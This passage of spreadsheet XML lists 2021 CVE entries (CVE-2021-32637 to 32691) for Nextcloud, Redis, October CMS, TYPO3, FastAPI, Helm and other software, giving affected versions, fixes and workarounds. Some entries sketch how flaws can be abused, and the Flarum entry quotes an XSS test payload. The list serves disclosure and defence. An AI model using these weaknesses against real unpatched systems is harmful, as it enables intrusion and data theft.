    <t>Singularity is an open source container platform. In verions 3.7.2 and 3.7.3, Dde to incorrect use of a default URL, `singularity` action commands (`run`/`shell`/`exec`) specifying a container using a `library://` URI will always attempt to retrieve the container from the default remote endpoint (`cloud.sylabs.io`) rather than the configured remote endpoint. An attacker may be able to push a malicious container to the default remote endpoint with a URI that is identical to the URI used by a victim with a non-default remote endpoint, thus executing the malicious container. Only action commands (`run`/`shell`/`exec`) against `library://` URIs are affected. Other commands such as `pull` / `push` respect the configured remote endpoint. The vulnerability is patched in Singularity version 3.7.4. Two possible workarounds exist: Users can only interact with the default remote endpoint, or an installation can have an execution control list configured to restrict execution to containers signed with specific secure keys.</t>
  </si>
  <si>
    <t>CVE-2021-32637</t>
  </si>
  <si>
    <t>Authelia is a a single sign-on multi-factor portal for web apps. This affects uses who are using nginx ngx_http_auth_request_module with Authelia, it allows a malicious individual who crafts a malformed HTTP request to bypass the authentication mechanism. It additionally could theoretically affect other proxy servers, but all of the ones we officially support except nginx do not allow malformed URI paths. The problem is rectified entirely in v4.29.3. As this patch is relatively straightforward we can back port this to any version upon request. Alternatively we are supplying a git patch to 4.25.1 which should be relatively straightforward to apply to any version, the git patches for specific versions can be found in the references. The most relevant workaround is upgrading. You can also add a block which fails requests that contains a malformed URI in the internal location block.</t>
  </si>
  <si>
    <t>CVE-2021-32638</t>
  </si>
  <si>
    <t>Github's CodeQL action is provided to run CodeQL-based code scanning on non-GitHub CI/CD systems and requires a GitHub access token to connect to a GitHub repository. The runner and its documentation previously suggested passing the GitHub token as a command-line parameter to the process instead of reading it from a file, standard input, or an environment variable. This approach made the token visible to other processes on the same machine, for example in the output of the `ps` command. If the CI system publicly exposes the output of `ps`, for example by logging the output, then the GitHub access token can be exposed beyond the scope intended. Users of the CodeQL runner on 3rd-party systems, who are passing a GitHub token via the `--github-auth` flag, are affected. This applies to both GitHub.com and GitHub Enterprise users. Users of the CodeQL Action on GitHub Actions are not affected. The `--github-auth` flag is now considered insecure and deprecated. The undocumented `--external-repository-token` flag has been removed. To securely provide a GitHub access token to the CodeQL runner, users should **do one of the following instead**: Use the `--github-auth-stdin` flag and pass the token on the command line via standard input OR set the `GITHUB_TOKEN` environment variable to contain the token, then call the command without passing in the token. The old flag remains present for backwards compatibility with existing workflows. If the user tries to specify an access token using the `--github-auth` flag, there is a deprecation warning printed to the terminal that directs the user to one of the above options. All CodeQL runner releases codeql-bundle-20210304 onwards contain the patches. We recommend updating to a recent version of the CodeQL runner, storing a token in your CI system's secret storage mechanism, and passing the token to the CodeQL runner using `--github-auth-stdin` or the `GITHUB_TOKEN` environment variable. If still using the old flag, ensure that process output, such as from `ps`, is not persisted in CI logs.</t>
  </si>
  <si>
    <t>CVE-2021-32639</t>
  </si>
  <si>
    <t>Emissary is a P2P-based, data-driven workflow engine. Emissary version 6.4.0 is vulnerable to Server-Side Request Forgery (SSRF). In particular, the `RegisterPeerAction` endpoint and the `AddChildDirectoryAction` endpoint are vulnerable to SSRF. This vulnerability may lead to credential leaks. Emissary version 7.0 contains a patch. As a workaround, disable network access to Emissary from untrusted sources.</t>
  </si>
  <si>
    <t>CVE-2021-3264</t>
  </si>
  <si>
    <t>SQL Injection vulnerability in cxuucms 3.1 ivia the pid parameter in public/admin.php.</t>
  </si>
  <si>
    <t>CVE-2021-32640</t>
  </si>
  <si>
    <t>ws is an open source WebSocket client and server library for Node.js. A specially crafted value of the `Sec-Websocket-Protocol` header can be used to significantly slow down a ws server. The vulnerability has been fixed in ws@7.4.6 (https://github.com/websockets/ws/commit/00c425ec77993773d823f018f64a5c44e17023ff). In vulnerable versions of ws, the issue can be mitigated by reducing the maximum allowed length of the request headers using the [`--max-http-header-size=size`](https://nodejs.org/api/cli.html#cli_max_http_header_size_size) and/or the [`maxHeaderSize`](https://nodejs.org/api/http.html#http_http_createserver_options_requestlistener) options.</t>
  </si>
  <si>
    <t>CVE-2021-32641</t>
  </si>
  <si>
    <t>auth0-lock is Auth0's signin solution. Versions of nauth0-lock before and including `11.30.0` are vulnerable to reflected XSS. An attacker can execute arbitrary code when the library's `flashMessage` feature is utilized and user input or data from URL parameters is incorporated into the `flashMessage` or the library's `languageDictionary` feature is utilized and user input or data from URL parameters is incorporated into the `languageDictionary`. The vulnerability is patched in version 11.30.1.</t>
  </si>
  <si>
    <t>CVE-2021-32642</t>
  </si>
  <si>
    <t>radsecproxy is a generic RADIUS proxy that supports both UDP and TLS (RadSec) RADIUS transports. Missing input validation in radsecproxy's `naptr-eduroam.sh` and `radsec-dynsrv.sh` scripts can lead to configuration injection via crafted radsec peer discovery DNS records. Users are subject to Information disclosure, Denial of Service, Redirection of Radius connection to a non-authenticated server leading to non-authenticated network access. Updated example scripts are available in the master branch and 1.9 release. Note that the scripts are not part of the installation package and are not updated automatically. If you are using the examples, you have to update them manually. The dyndisc scripts work independently of the radsecproxy code. The updated scripts can be used with any version of radsecproxy.</t>
  </si>
  <si>
    <t>CVE-2021-32643</t>
  </si>
  <si>
    <t>Http4s is a Scala interface for HTTP services. `StaticFile.fromUrl` can leak the presence of a directory on a server when the `URL` scheme is not `file://`, and the URL points to a fetchable resource under its scheme and authority. The function returns `F[None]`, indicating no resource, if `url.getFile` is a directory, without first checking the scheme or authority of the URL. If a URL connection to the scheme and URL would return a stream, and the path in the URL exists as a directory on the server, the presence of the directory on the server could be inferred from the 404 response. The contents and other metadata about the directory are not exposed. This affects http4s versions: 0.21.7 through 0.21.23, 0.22.0-M1 through 0.22.0-M8, 0.23.0-M1, and 1.0.0-M1 through 1.0.0-M22. The [patch](https://github.com/http4s/http4s/commit/52e1890665410b4385e37b96bc49c5e3c708e4e9) is available in the following versions: v0.21.24, v0.22.0-M9, v0.23.0-M2, v1.0.0-M23. As a workaround users can avoid calling `StaticFile.fromUrl` with non-file URLs.</t>
  </si>
  <si>
    <t>CVE-2021-32644</t>
  </si>
  <si>
    <t>Ampache is an open source web based audio/video streaming application and file manager. Due to a lack of input filtering versions 4.x.y are vulnerable to code injection in random.php. The attack requires user authentication to access the random.php page unless the site is running in demo mode. This issue has been resolved in 4.4.3.</t>
  </si>
  <si>
    <t>CVE-2021-32645</t>
  </si>
  <si>
    <t>Tenancy multi-tenant is an open source multi-domain controller for the Laravel web framework. In some situations, it is possible to have open redirects where users can be redirected from your site to any other site using a specially crafted URL. This is only the case for installations where the default Hostname Identification is used and the environment uses tenants that have `force_https` set to `true` (default: `false`). Version 5.7.2 contains the relevant patches to fix this bug. Stripping the URL from special characters to prevent specially crafted URL's from being redirected to. As a work around users can set the `force_https` to every tenant to `false`, however this may degrade connection security.</t>
  </si>
  <si>
    <t>CVE-2021-32646</t>
  </si>
  <si>
    <t>Roomer is a discord bot cog (extension) which provides automatic voice channel generation as well as private voice and text channels. A vulnerability has been discovered allowing discord users to get the ``manage channel`` permissions in a private VC they have joined. This allowed them to make changes to or delete the voice channel they have taken over. The exploit does not allow access or control to any other channels in the server. Upgrade to version 1.0.1 for a patched version of the cog. As a workaround you may disable private VCs in your guild(server) or unload the roomer cog to render the exploit unusable.</t>
  </si>
  <si>
    <t>CVE-2021-32647</t>
  </si>
  <si>
    <t>Emissary is a P2P based data-driven workflow engine. Affected versions of Emissary are vulnerable to post-authentication Remote Code Execution (RCE). The [`CreatePlace`](https://github.com/NationalSecurityAgency/emissary/blob/30c54ef16c6eb6ed09604a929939fb9f66868382/src/main/java/emissary/server/mvc/internal/CreatePlaceAction.java#L36) REST endpoint accepts an `sppClassName` parameter which is used to load an arbitrary class. This class is later instantiated using a constructor with the following signature: `&lt;constructor&gt;(String, String, String)`. An attacker may find a gadget (class) in the application classpath that could be used to achieve Remote Code Execution (RCE) or disrupt the application. Even though the chances to find a gadget (class) that allow arbitrary code execution are low, an attacker can still find gadgets that could potentially crash the application or leak sensitive data. As a work around disable network access to Emissary from untrusted sources.</t>
  </si>
  <si>
    <t>CVE-2021-32648</t>
  </si>
  <si>
    <t>octobercms in a CMS platform based on the Laravel PHP Framework. In affected versions of the october/system package an attacker can request an account password reset and then gain access to the account using a specially crafted request. The issue has been patched in Build 472 and v1.1.5.</t>
  </si>
  <si>
    <t>CVE-2021-32649</t>
  </si>
  <si>
    <t>October CMS is a self-hosted content management system (CMS) platform based on the Laravel PHP Framework. Prior to versions 1.0.473 and 1.1.6, an attacker with "create, modify and delete website pages" privileges in the backend is able to execute PHP code by running specially crafted Twig code in the template markup. The issue has been patched in Build 473 (v1.0.473) and v1.1.6. Those unable to upgrade may apply the patch to their installation manually as a workaround.</t>
  </si>
  <si>
    <t>CVE-2021-32650</t>
  </si>
  <si>
    <t>October CMS is a self-hosted content management system (CMS) platform based on the Laravel PHP Framework. Prior to versions 1.0.473 and 1.1.6, an attacker with access to the backend is able to execute PHP code by using the theme import feature. This will bypass the safe mode feature that prevents PHP execution in the CMS templates.The issue has been patched in Build 473 (v1.0.473) and v1.1.6. Those unable to upgrade may apply the patch to their installation manually as a workaround.</t>
  </si>
  <si>
    <t>CVE-2021-32651</t>
  </si>
  <si>
    <t>OneDev is a development operations platform. If the LDAP external authentication mechanism is enabled in OneDev versions 4.4.1 and prior, an attacker can manipulate a user search filter to send forged queries to the application and explore the LDAP tree using Blind LDAP Injection techniques. The specific payload depends on how the User Search Filter property is configured in OneDev. This issue was fixed in version 4.4.2.</t>
  </si>
  <si>
    <t>CVE-2021-32652</t>
  </si>
  <si>
    <t>Nextcloud Mail is a mail app for the Nextcloud platform. A missing permission check in Nextcloud Mail before 1.4.3 and 1.8.2 allows another authenticated users to access mail metadata of other users. Versions 1.4.3 and 1.8.2 contain patches for this vulnerability; no workarounds other than the patches are known to exist.</t>
  </si>
  <si>
    <t>CVE-2021-32653</t>
  </si>
  <si>
    <t>Nextcloud Server is a Nextcloud package that handles data storage. Nextcloud Server versions prior to 19.0.11, 20.0.10, or 21.0.2 send user IDs to the lookup server even if the user has no fields set to published. The vulnerability is patched in versions 19.0.11, 20.0.10, and 21.0.2; no workarounds outside the updates are known to exist.</t>
  </si>
  <si>
    <t>CVE-2021-32654</t>
  </si>
  <si>
    <t>Nextcloud Server is a Nextcloud package that handles data storage. In versions prior to 19.0.11, 20.0.10, and 21.0.2, an attacker is able to receive write/read privileges on any Federated File Share. Since public links can be added as federated file share, this can also be exploited on any public link. Users can upgrade to patched versions (19.0.11, 20.0.10 or 21.0.2) or, as a workaround, disable federated file sharing.</t>
  </si>
  <si>
    <t>CVE-2021-32655</t>
  </si>
  <si>
    <t>Nextcloud Server is a Nextcloud package that handles data storage. In versions prior to 19.0.11, 20.0.10, and 21.0.2, an attacker is able to convert a Files Drop link to a federated share. This causes an issue on the UI side of the sharing user. When the sharing user opens the sharing panel and tries to remove the "Create" privileges of this unexpected share, Nextcloud server would silently grant the share read privileges. The vulnerability is patched in versions 19.0.11, 20.0.10 and 21.0.2. No workarounds are known to exist.</t>
  </si>
  <si>
    <t>CVE-2021-32656</t>
  </si>
  <si>
    <t>Nextcloud Server is a Nextcloud package that handles data storage. A vulnerability in federated share exists in versions prior to 19.0.11, 20.0.10, and 21.0.2. An attacker can gain access to basic information about users of a server by accessing a public link that a legitimate server user added as a federated share. This happens because Nextcloud supports sharing registered users with other Nextcloud servers, which can be done automatically when selecting the "Add server automatically once a federated share was created successfully" setting. The vulnerability is patched in versions 19.0.11, 20.0.10, and 21.0.2 As a workaround, disable "Add server automatically once a federated share was created successfully" in the Nextcloud settings.</t>
  </si>
  <si>
    <t>CVE-2021-32657</t>
  </si>
  <si>
    <t>Nextcloud Server is a Nextcloud package that handles data storage. In versions of Nextcloud Server prior to 10.0.11, 20.0.10, and 21.0.2, a malicious user may be able to break the user administration page. This would disallow administrators to administrate users on the Nextcloud instance. The vulnerability is fixed in versions 19.0.11, 20.0.10, and 21.0.2. As a workaround, administrators can use the OCC command line tool to administrate the Nextcloud users.</t>
  </si>
  <si>
    <t>CVE-2021-32658</t>
  </si>
  <si>
    <t>Nextcloud Android is the Android client for the Nextcloud open source home cloud system. Due to a timeout issue the Android client may not properly clean all sensitive data on account removal. This could include sensitive key material such as the End-to-End encryption keys. It is recommended that the Nextcloud Android App is upgraded to 3.16.1</t>
  </si>
  <si>
    <t>CVE-2021-32659</t>
  </si>
  <si>
    <t>Matrix-appservice-bridge is the bridging service for the Matrix communication program's application services. In versions 2.6.0 and earlier, if a bridge has room upgrade handling turned on in the configuration (the `roomUpgradeOpts` key when instantiating a new `Bridge` instance.), any `m.room.tombstone` event it encounters will be used to unbridge the current room and bridge into the target room. However, the target room `m.room.create` event is not checked to verify if the `predecessor` field contains the previous room. This means that any malicious admin of a bridged room can repoint the traffic to a different room without the new room being aware. Versions 2.6.1 and greater are patched. As a workaround, disabling the automatic room upgrade handling can be done by removing the `roomUpgradeOpts` key from the `Bridge` class options.</t>
  </si>
  <si>
    <t>CVE-2021-32660</t>
  </si>
  <si>
    <t>Backstage is an open platform for building developer portals, and techdocs-common contains common functionalities for Backstage's TechDocs. In versions of `@backstage/tehdocs-common` prior to 0.6.4, a malicious internal actor is able to upload documentation content with malicious scripts. These scripts would normally be sanitized by the TechDocs frontend, but by tricking a user to visit the content via the TechDocs API, the content sanitazion will be bypassed. If the TechDocs API is hosted on the same origin as the Backstage app or other backend plugins, this may give access to sensitive data. The ability to upload malicious content may be limited by internal code review processes, unless the chosen TechDocs deployment method is to use an object store and the actor has access to upload files directly to that store. The vulnerability is patched in the `0.6.4` release of `@backstage/techdocs-common`.</t>
  </si>
  <si>
    <t>CVE-2021-32661</t>
  </si>
  <si>
    <t>Backstage is an open platform for building developer portals. In versions of Backstage's Techdocs Plugin (`@backstage/plugin-techdocs`) prior to 0.9.5, a malicious internal actor can potentially upload documentation content with malicious scripts by embedding the script within an `object` element. This may give access to sensitive data when other users visit that same documentation page. The ability to upload malicious content may be limited by internal code review processes, unless the chosen TechDocs deployment method is to use an object store and the actor has access to upload files directly to that store. The vulnerability is patched in the `0.9.5` release of `@backstage/plugin-techdocs`.</t>
  </si>
  <si>
    <t>CVE-2021-32662</t>
  </si>
  <si>
    <t>Backstage is an open platform for building developer portals, and techdocs-common contains common functionalities for Backstage's TechDocs. In `@backstage/techdocs-common` versions prior to 0.6.3, a malicious actor could read sensitive files from the environment where TechDocs documentation is built and published by setting a particular path for `docs_dir` in `mkdocs.yml`. These files would then be available over the TechDocs backend API. This vulnerability is mitigated by the fact that an attacker would need access to modify the `mkdocs.yml` in the documentation source code, and would also need access to the TechDocs backend API. The vulnerability is patched in the `0.6.3` release of `@backstage/techdocs-common`.</t>
  </si>
  <si>
    <t>CVE-2021-32663</t>
  </si>
  <si>
    <t>iTop is an open source web based IT Service Management tool. In affected versions an attacker can call the system setup without authentication. Given specific parameters this can lead to SSRF. This issue has been resolved in versions 2.6.5 and 2.7.5 and later</t>
  </si>
  <si>
    <t>CVE-2021-32664</t>
  </si>
  <si>
    <t>Combodo iTop is an open source web based IT Service Management tool. In affected versions there is a XSS vulnerability on "run query" page when logged as administrator. This has been resolved in versions 2.6.5 and 2.7.5.</t>
  </si>
  <si>
    <t>CVE-2021-32665</t>
  </si>
  <si>
    <t>wire-ios is the iOS version of Wire, an open-source secure messaging app. wire-ios versions 3.8.0 and earlier have a bug in which a conversation could be incorrectly set to "unverified. This occurs when: - Self user is added to a new conversation - Self user is added to an existing conversation - All the participants in the conversation were previously marked as verified. The vulnerability is patched in wire-ios version 3.8.1. As a workaround, one can unverify &amp; verify a device in the conversation.</t>
  </si>
  <si>
    <t>CVE-2021-32666</t>
  </si>
  <si>
    <t>wire-ios is the iOS version of Wire, an open-source secure messaging app. In wire-ios versions 3.8.0 and prior, a vulnerability exists that can cause a denial of service between users. If a user has an invalid assetID for their profile picture and it contains the " character, it will cause the iOS client to crash. The vulnerability is patched in wire-ios version 3.8.1.</t>
  </si>
  <si>
    <t>CVE-2021-32667</t>
  </si>
  <si>
    <t>TYPO3 is an open source PHP based web content management system. Versions 9.0.0 through 9.5.28, 10.0.0 through 10.4.17, and 11.0.0 through 11.3.0 have a cross-site scripting vulnerability. When _Page TSconfig_ settings are not properly encoded, corresponding page preview module (_Web&gt;View_) is vulnerable to persistent cross-site scripting. A valid backend user account is needed to exploit this vulnerability. TYPO3 versions 9.5.29, 10.4.18, 11.3.1 contain a patch for this issue.</t>
  </si>
  <si>
    <t>CVE-2021-32668</t>
  </si>
  <si>
    <t>TYPO3 is an open source PHP based web content management system. Versions 9.0.0 through 9.5.28, 10.0.0 through 10.4.17, and 11.0.0 through 11.3.0 have a cross-site scripting vulnerability. When error messages are not properly encoded, the components _QueryGenerator_ and _QueryView_ are vulnerable to both reflected and persistent cross-site scripting. A valid backend user account having administrator privileges is needed to exploit this vulnerability. TYPO3 versions 9.5.29, 10.4.18, 11.3.1 contain a patch for this issue.</t>
  </si>
  <si>
    <t>CVE-2021-32669</t>
  </si>
  <si>
    <t>TYPO3 is an open source PHP based web content management system. Versions 9.0.0 through 9.5.28, 10.0.0 through 10.4.17, and 11.0.0 through 11.3.0 have a cross-site scripting vulnerability. When settings for _backend layouts_ are not properly encoded, the corresponding grid view is vulnerable to persistent cross-site scripting. A valid backend user account is needed to exploit this vulnerability. TYPO3 versions 9.5.29, 10.4.18, 11.3.1 contain a patch for this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-32670</t>
  </si>
  <si>
    <t>Datasette is an open source multi-tool for exploring and publishing data. The `?_trace=1` debugging feature in Datasette does not correctly escape generated HTML, resulting in a [reflected cross-site scripting](https://owasp.org/www-community/attacks/xss/#reflected-xss-attacks) vulnerability. This vulnerability is particularly relevant if your Datasette installation includes authenticated features using plugins such as [datasette-auth-passwords](https://datasette.io/plugins/datasette-auth-passwords) as an attacker could use the vulnerability to access protected data. Datasette 0.57 and 0.56.1 both include patches for this issue. If you run Datasette behind a proxy you can workaround this issue by rejecting any incoming requests with `?_trace=` or `&amp;_trace=` in their query string parameters.</t>
  </si>
  <si>
    <t>CVE-2021-32671</t>
  </si>
  <si>
    <t>Flarum is a forum software for building communities. Flarum's translation system allowed for string inputs to be converted into HTML DOM nodes when rendered. This change was made after v0.1.0-beta.16 (our last beta before v1.0.0) and was not noticed or documented. This allowed for any user to type malicious HTML markup within certain user input fields and have this execute on client browsers. The example which led to the discovery of this vulnerability was in the forum search box. Entering faux-malicious HTML markup, such as &lt;script&gt;alert('test')&lt;/script&gt; resulted in an alert box appearing on the forum. This attack could also be modified to perform AJAX requests on behalf of a user, possibly deleting discussions, modifying their settings or profile, or even modifying settings on the Admin panel if the attack was targetted towards a privileged user. All Flarum communities that run flarum v1.0.0 or v1.0.1 are impacted. The vulnerability has been fixed and published as flarum/core v1.0.2. All communities running Flarum v1.0 have to upgrade as soon as possible to v1.0.2.</t>
  </si>
  <si>
    <t>CVE-2021-32672</t>
  </si>
  <si>
    <t>Redis is an open source, in-memory database that persists on disk. When using the Redis Lua Debugger, users can send malformed requests that cause the debugger’s protocol parser to read data beyond the actual buffer. This issue affects all versions of Redis with Lua debugging support (3.2 or newer). The problem is fixed in versions 6.2.6, 6.0.16 and 5.0.14.</t>
  </si>
  <si>
    <t>CVE-2021-32673</t>
  </si>
  <si>
    <t>reg-keygen-git-hash-plugin is a reg-suit plugin to detect the snapshot key to be compare with using Git commit hash. reg-keygen-git-hash-plugin through and including 0.10.15 allow remote attackers to execute of arbitrary commands. Upgrade to version 0.10.16 or later to resolve this issue.</t>
  </si>
  <si>
    <t>CVE-2021-32674</t>
  </si>
  <si>
    <t>Zope is an open-source web application server. This advisory extends the previous advisory at https://github.com/zopefoundation/Zope/security/advisories/GHSA-5pr9-v234-jw36 with additional cases of TAL expression traversal vulnerabilities. Most Python modules are not available for using in TAL expressions that you can add through-the-web, for example in Zope Page Templates. This restriction avoids file system access, for example via the 'os' module. But some of the untrusted modules are available indirectly through Python modules that are available for direct use. By default, you need to have the Manager role to add or edit Zope Page Templates through the web. Only sites that allow untrusted users to add/edit Zope Page Templates through the web are at risk. The problem has been fixed in Zope 5.2.1 and 4.6.1. The workaround is the same as for https://github.com/zopefoundation/Zope/security/advisories/GHSA-5pr9-v234-jw36: A site administrator can restrict adding/editing Zope Page Templates through the web using the standard Zope user/role permission mechanisms. Untrusted users should not be assigned the Zope Manager role and adding/editing Zope Page Templates through the web should be restricted to trusted users only.</t>
  </si>
  <si>
    <t>CVE-2021-32675</t>
  </si>
  <si>
    <t>Redis is an open source, in-memory database that persists on disk. When parsing an incoming Redis Standard Protocol (RESP) request, Redis allocates memory according to user-specified values which determine the number of elements (in the multi-bulk header) and size of each element (in the bulk header). An attacker delivering specially crafted requests over multiple connections can cause the server to allocate significant amount of memory. Because the same parsing mechanism is used to handle authentication requests, this vulnerability can also be exploited by unauthenticated users. The problem is fixed in Redis versions 6.2.6, 6.0.16 and 5.0.14. An additional workaround to mitigate this problem without patching the redis-server executable is to block access to prevent unauthenticated users from connecting to Redis. This can be done in different ways: Using network access control tools like firewalls, iptables, security groups, etc. or Enabling TLS and requiring users to authenticate using client side certificates.</t>
  </si>
  <si>
    <t>CVE-2021-32676</t>
  </si>
  <si>
    <t>Nextcloud Talk is a fully on-premises audio/video and chat communication service. Password protected shared chats in Talk before version 9.0.10, 10.0.8 and 11.2.2 did not rotate the session cookie after a successful authentication event. It is recommended that the Nextcloud Talk App is upgraded to 9.0.10, 10.0.8 or 11.2.2. No workarounds for this vulnerability are known to exist.</t>
  </si>
  <si>
    <t>CVE-2021-32677</t>
  </si>
  <si>
    <t>FastAPI is a web framework for building APIs with Python 3.6+ based on standard Python type hints. FastAPI versions lower than 0.65.2 that used cookies for authentication in path operations that received JSON payloads sent by browsers were vulnerable to a Cross-Site Request Forgery (CSRF) attack. In versions lower than 0.65.2, FastAPI would try to read the request payload as JSON even if the content-type header sent was not set to application/json or a compatible JSON media type (e.g. application/geo+json). A request with a content type of text/plain containing JSON data would be accepted and the JSON data would be extracted. Requests with content type text/plain are exempt from CORS preflights, for being considered Simple requests. The browser will execute them right away including cookies, and the text content could be a JSON string that would be parsed and accepted by the FastAPI application. This is fixed in FastAPI 0.65.2. The request data is now parsed as JSON only if the content-type header is application/json or another JSON compatible media type like application/geo+json. It's best to upgrade to the latest FastAPI, but if updating is not possible then a middleware or a dependency that checks the content-type header and aborts the request if it is not application/json or another JSON compatible content type can act as a mitigating workaround.</t>
  </si>
  <si>
    <t>CVE-2021-32678</t>
  </si>
  <si>
    <t>Nextcloud Server is a Nextcloud package that handles data storage. In versions prior to 19.0.13, 20.0.11, and 21.0.3, ratelimits are not applied to OCS API responses. This affects any OCS API controller (`OCSController`) using the `@BruteForceProtection` annotation. Risk depends on the installed applications on the Nextcloud Server, but could range from bypassing authentication ratelimits or spamming other Nextcloud users. The vulnerability is patched in versions 19.0.13, 20.0.11, and 21.0.3. No workarounds aside from upgrading are known to exist.</t>
  </si>
  <si>
    <t>799</t>
  </si>
  <si>
    <t>CVE-2021-32679</t>
  </si>
  <si>
    <t>Nextcloud Server is a Nextcloud package that handles data storage. In versions prior to 19.0.13, 20.0.11, and 21.0.3, filenames where not escaped by default in controllers using `DownloadResponse`. When a user-supplied filename was passed unsanitized into a `DownloadResponse`, this could be used to trick users into downloading malicious files with a benign file extension. This would show in UI behaviours where Nextcloud applications would display a benign file extension (e.g. JPEG), but the file will actually be downloaded with an executable file extension. The vulnerability is patched in versions 19.0.13, 20.0.11, and 21.0.3. Administrators of Nextcloud instances do not have a workaround available, but developers of Nextcloud apps may manually escape the file name before passing it into `DownloadResponse`.</t>
  </si>
  <si>
    <t>CVE-2021-32680</t>
  </si>
  <si>
    <t>Nextcloud Server is a Nextcloud package that handles data storage. In versions priot to 19.0.13, 20.0.11, and 21.0.3, Nextcloud Server audit logging functionality wasn't properly logging events for the unsetting of a share expiration date. This event is supposed to be logged. This issue is patched in versions 19.0.13, 20.0.11, and 21.0.3.</t>
  </si>
  <si>
    <t>CVE-2021-32681</t>
  </si>
  <si>
    <t>Wagtail is an open source content management system built on Django. A cross-site scripting vulnerability exists in versions 2.13-2.13.1, versions 2.12-2.12.4, and versions prior to 2.11.8. When the `{% include_block %}` template tag is used to output the value of a plain-text StreamField block (`CharBlock`, `TextBlock` or a similar user-defined block derived from `FieldBlock`), and that block does not specify a template for rendering, the tag output is not properly escaped as HTML. This could allow users to insert arbitrary HTML or scripting. This vulnerability is only exploitable by users with the ability to author StreamField content (i.e. users with 'editor' access to the Wagtail admin). Patched versions have been released as Wagtail 2.11.8 (for the LTS 2.11 branch), Wagtail 2.12.5, and Wagtail 2.13.2 (for the current 2.13 branch). As a workaround, site implementors who are unable to upgrade to a current supported version should audit their use of `{% include_block %}` to ensure it is not used to output `CharBlock` / `TextBlock` values with no associated template. Note that this only applies where `{% include_block %}` is used directly on that block (uses of `include_block` on a block _containing_ a CharBlock / TextBlock, such as a StructBlock, are unaffected). In these cases, the tag can be replaced with Django's `{{ ... }}` syntax - e.g. `{% include_block my_title_block %}` becomes `{{ my_title_block }}`.</t>
  </si>
  <si>
    <t>CVE-2021-32682</t>
  </si>
  <si>
    <t>elFinder is an open-source file manager for web, written in JavaScript using jQuery UI. Several vulnerabilities affect elFinder 2.1.58. These vulnerabilities can allow an attacker to execute arbitrary code and commands on the server hosting the elFinder PHP connector, even with minimal configuration. The issues were patched in version 2.1.59. As a workaround, ensure the connector is not exposed without authentication.</t>
  </si>
  <si>
    <t>CVE-2021-32683</t>
  </si>
  <si>
    <t>wire-webapp is the web version of Wire, an open-source messenger. A cross-site scripting vulnerability exists in wire-webapp prior to version 2021-06-01-production.0. If a user is instructed to open an image in a new tab (right click -&gt; open in new tab, or copy the URL and paste it in the URL bar), an the image payload is executed on the domain hosting the app (app.wire.com). In particular, if an image contains malicious code in addition to the actual picture, this code is executed on app.wire.com. This allows the attacker to fully control the user account. The vulnerability was patched in version 2021-06-01-production.0. As a workaround, users should not try to open image URLs.</t>
  </si>
  <si>
    <t>CVE-2021-32684</t>
  </si>
  <si>
    <t>magento-scripts contains scripts and configuration used by Create Magento App, a zero-configuration tool-chain which allows one to deploy Magento 2. In versions 1.5.1 and 1.5.2, after changing the function from synchronous to asynchronous there wasn't implemented handler in the start, stop, exec, and logs commands, effectively making them unusable. Version 1.5.3 contains patches for the problems.</t>
  </si>
  <si>
    <t>CVE-2021-32685</t>
  </si>
  <si>
    <t>tEnvoy contains the PGP, NaCl, and PBKDF2 in node.js and the browser (hashing, random, encryption, decryption, signatures, conversions), used by TogaTech.org. In versions prior to 7.0.3, the `verifyWithMessage` method of `tEnvoyNaClSigningKey` always returns `true` for any signature that has a SHA-512 hash matching the SHA-512 hash of the message even if the signature was invalid. This issue is patched in version 7.0.3. As a workaround: In `tenvoy.js` under the `verifyWithMessage` method definition within the `tEnvoyNaClSigningKey` class, ensure that the return statement call to `this.verify` ends in `.verified`.</t>
  </si>
  <si>
    <t>CVE-2021-32686</t>
  </si>
  <si>
    <t>PJSIP is a free and open source multimedia communication library written in C language implementing standard based protocols such as SIP, SDP, RTP, STUN, TURN, and ICE. In PJSIP before version 2.11.1, there are a couple of issues found in the SSL socket. First, a race condition between callback and destroy, due to the accepted socket having no group lock. Second, the SSL socket parent/listener may get destroyed during handshake. Both issues were reported to happen intermittently in heavy load TLS connections. They cause a crash, resulting in a denial of service. These are fixed in version 2.11.1.</t>
  </si>
  <si>
    <t>CVE-2021-32687</t>
  </si>
  <si>
    <t>Redis is an open source, in-memory database that persists on disk. An integer overflow bug affecting all versions of Redis can be exploited to corrupt the heap and potentially be used to leak arbitrary contents of the heap or trigger remote code execution. The vulnerability involves changing the default set-max-intset-entries configuration parameter to a very large value and constructing specially crafted commands to manipulate sets. The problem is fixed in Redis versions 6.2.6, 6.0.16 and 5.0.14. An additional workaround to mitigate the problem without patching the redis-server executable is to prevent users from modifying the set-max-intset-entries configuration parameter. This can be done using ACL to restrict unprivileged users from using the CONFIG SET command.</t>
  </si>
  <si>
    <t>CVE-2021-32688</t>
  </si>
  <si>
    <t>Nextcloud Server is a Nextcloud package that handles data storage. Nextcloud Server supports application specific tokens for authentication purposes. These tokens are supposed to be granted to a specific applications (e.g. DAV sync clients), and can also be configured by the user to not have any filesystem access. Due to a lacking permission check, the tokens were able to change their own permissions in versions prior to 19.0.13, 20.0.11, and 21.0.3. Thus fileystem limited tokens were able to grant themselves access to the filesystem. The issue is patched in versions 19.0.13, 20.0.11, and 21.0.3. There are no known workarounds aside from upgrading.</t>
  </si>
  <si>
    <t>CVE-2021-32689</t>
  </si>
  <si>
    <t>Nextcloud Talk is a fully on-premises audio/video and chat communication service. In versions prior to 11.2.2, if a user was able to reuse an earlier used username, they could get access to any chat message sent to the previous user with this username. The issue was patched in versions 11.2.2 and 11.3.0. As a workaround, don't allow users to choose usernames themselves. This is the default behaviour of Nextcloud, but some user providers may allow doing so.</t>
  </si>
  <si>
    <t>CVE-2021-32690</t>
  </si>
  <si>
    <t>Helm is a tool for managing Charts (packages of pre-configured Kubernetes resources). In versions of helm prior to 3.6.1, a vulnerability exists where the username and password credentials associated with a Helm repository could be passed on to another domain referenced by that Helm repository. This issue has been resolved in 3.6.1. There is a workaround through which one may check for improperly passed credentials. One may use a username and password for a Helm repository and may audit the Helm repository in order to check for another domain being used that could have received the credentials. In the `index.yaml` file for that repository, one may look for another domain in the `urls` list for the chart versions. If there is another domain found and that chart version was pulled or installed, the credentials would be passed on.</t>
  </si>
  <si>
    <t>CVE-2021-32691</t>
  </si>
  <si>
    <t>Apollos Apps is an open source platform for launching church-related apps. In Apollos Apps versions prior to 2.20.0, new user registrations are able to access anyone's account by only knowing their basic profile information (name, birthday, gender, etc). This includes all app functionality within the app, as well as any authenticated links to Rock-based webpages (such as giving and events). There is a patch in version 2.20.0. As a workaround, one can patch one's server by overriding the `create` data source method on the `People` class.</t>
  </si>
  <si>
